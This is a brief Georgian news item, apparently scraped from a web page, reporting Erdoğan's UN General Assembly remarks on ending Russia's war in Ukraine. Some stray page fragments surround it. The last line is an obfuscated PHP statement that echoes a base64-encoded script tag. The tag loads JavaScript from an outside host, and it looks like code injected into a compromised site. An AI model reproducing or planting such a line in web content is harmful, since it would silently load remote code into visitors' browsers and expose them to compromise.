celsiusi
ავერსი საქკაბელი
ნიუ იორკში გაეროს 77-ე ასამბლეა გრძელდება. ასამბეაზე მსოფლიოს ლიდერებს თურქეთის პრეზიდენტმა, რეჯეფ თაიფ ერდოღანმა მიმართა და თქვა, რომ რუსეთის ომი უკრაინის სუვერენიტეტისა და ტერიტორიული მთლიანობის სრული დაცვით უნდა დასრულდეს.
 
"ომს არასოდეს ეყოლება გამარჯვებული და სამართლიან სამშვიდობო პროცესს არ ეყოლება დამარცხებული. ეს არის მნიშვნელოვანი, რადგან ჩვენ ყოველთვის ვუსვამთ ხაზს დიპლომატიის მნიშვნელობას უთანხმოების მშვიდობიანად გადასაწყვეტად დიალოგის მეშვეობით. მიმდინარეობს კონფლიქტის ესკალაცია და ჩვენ დებთ უზარმაზარ ძალისხმევას, რათა უზრუნველვყოთ ომის დასრულება უკრაინის სუვერენიტეტისა და ტერიტორიული მთლიანობის სრული დაცვით"- თქვა მან. 
 
აღსანიშნავია, რომ დღეს ასამბლეის მონაწილეებს საქართველოს პრემიერ-მინისტრი ირაკლი ღარიბაშვილი მიმართავს. გაირკვევა რას იტყვის პრემიერი უკრაინაში მიმდინარე ომზე, რომელიც ასამბლეის ერთ-ერთი მთავარი თემაა.
361
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");